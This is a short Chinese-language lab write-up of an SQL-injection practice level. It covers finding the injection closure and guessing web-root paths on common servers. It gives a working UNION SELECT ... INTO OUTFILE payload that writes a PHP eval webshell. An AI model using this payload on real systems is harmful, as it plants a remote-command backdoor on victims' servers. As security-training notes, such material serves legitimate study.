前言
第7关 导出文件GET字符型注入
步骤OK,但是就是不能写入文件,不知是文件夹的问题还是自己操作的问题。但是确实,没有导入成功。
1. 查看闭合,看源码,发现闭合是((‘ ’));
2.查看所在位置:
@@datadir 读取数据库路径
@@basedir MYSQL 获取安装路径
但是在less7中,没有输出信息,所以我们只能盲打:
winserver的iis默认路径是c:/inetpub/wwwroot/,PHPstudy的是F:phpStudyPHPTutorialWWW
linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等,
apache 就/var/www/htm,/var/www/html/htdocs
3.使用into outfile写入一句话木马,然后连接就行了。
?id=1')) union select 1,2,'<?php @eval($_POST["cmd"]);?>' into outfile "路径\间隔"--+
4.我搭建的物理机,所以没有尝试连菜刀。还有个问题就是不能写入文件,修改了文件夹属性也不行。希望后面几关可以帮助我解开疑惑。